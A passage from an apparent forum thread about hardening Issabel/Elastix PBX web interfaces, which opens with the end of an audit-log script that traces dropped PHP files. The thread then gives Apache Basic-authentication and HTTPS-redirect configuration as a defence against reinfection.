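        if (name ~ /\.php$/) { n++; ev[n] = id; path[n] = name }
    }
    END {
        for (i = 1; i <= n; i++)
            print path[i], exe[ev[i]], "pid=" pid[ev[i]], "uid=" uid[ev[i]]
    }'
}

sample_audit_log | summarize_drops
```

If the writer turns out to be `/usr/sbin/httpd`, the file arrived through a web request, so match the event time against the POST lines in the access and ssl_access logs.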

                          Hello, sorry for my English.
                          I usually protect all my servers with htaccess so that at least not just anyone can access the web part. I am copying what you have to do to make it ask for a username and password when accessing Issabel (or the old Elastix). I wrote it in Spanish because I do not know English well, but I hope it is understood.

                          You give your clients the username and password, and with that only those who know them can access via the web.

                          I hope it helps.

                          In the configuration file at

                          vi /etc/httpd/conf.d/elastix.conf

                          in the file elastix.conf

                          you have to put something like this

                          # Apache-level configuration for Elastix administration interface

                          Timeout 300

                          # Default apache configuration specifies greater limits than these

                          #MaxClients 150
                          #MaxRequestsPerChild 1000

                          # Default apache User and Group directives MUST be commented out
                          # in order for these to take effect.

                          User asterisk
                          Group asterisk

                          # this is to ask for a username and password when entering via the web, for more security

                          <Directory "/var/www/html">
                          # Redirect administration interface to https
                          RewriteEngine On
                          RewriteCond %{HTTPS} off
                          RewriteRule (.*) https://%{HTTP_HOST}%{REQUEST_URI}
                          AuthType Basic
                          AuthName "Zona Restringida voip"
                          AuthUserFile /usr/local/apache/wwwpasswd
                          Require user clientes
                          </Directory>

                          Then save it and run

                          To create the directory and the users for the requested password, for example for clientes, which is the user, it would be

                          The next step is to generate the password with the command

                          mkdir /usr/local/apache
                          htpasswd -c /usr/local/apache/wwwpasswd clientes

                          It will then ask you to enter a password. Once these steps are finished, Apache must be restarted for the changes to take effect

                          service httpd restart

                          And that's it; with this it will ask for a username and password on port 443

                            Hello hgmnetwork,
                            Thanks for the workaround.

                            Is it useful for this problem to remove ARI?

                              To remove it if it is infected, no; but it should not happen again once cleaned, since it blocks HTTP access for requests without a password.

                              Sorry for my English